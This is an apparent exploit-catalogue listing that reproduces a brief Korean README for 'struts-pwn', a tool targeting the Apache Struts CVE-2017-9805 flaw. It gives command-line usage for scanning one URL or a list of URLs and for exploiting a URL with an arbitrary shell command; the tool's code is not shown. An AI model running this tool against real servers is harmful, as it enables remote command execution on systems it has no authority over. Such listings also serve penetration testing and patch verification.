Sploitus

Exploit for struts-pwn_CVE-2017-9805

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN18 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MAZEN160-STRUTS-PWN_CVE-2017-9805
# _struts-pwn - CVE-2017-9805 μ΅μŠ€ν”Œλ‘œμž‡_

### Apache Struts CVE-2017-9805용 μ΅μŠ€ν”Œλ‘œμž‡

# **μ‚¬μš©λ²•**

## 단일 URL에 취약점이 μ‘΄μž¬ν•˜λŠ”μ§€ ν™•μΈν•©λ‹ˆλ‹€.

`python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'`

## URL λͺ©λ‘μ— 취약점이 μ‘΄μž¬ν•˜λŠ”μ§€ ν™•μΈν•©λ‹ˆλ‹€.

`python struts-pwn.py --list 'urls.txt'`

## 단일 URL을 μ΅μŠ€ν”Œλ‘œμž‡ν•©λ‹ˆλ‹€.

`python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'`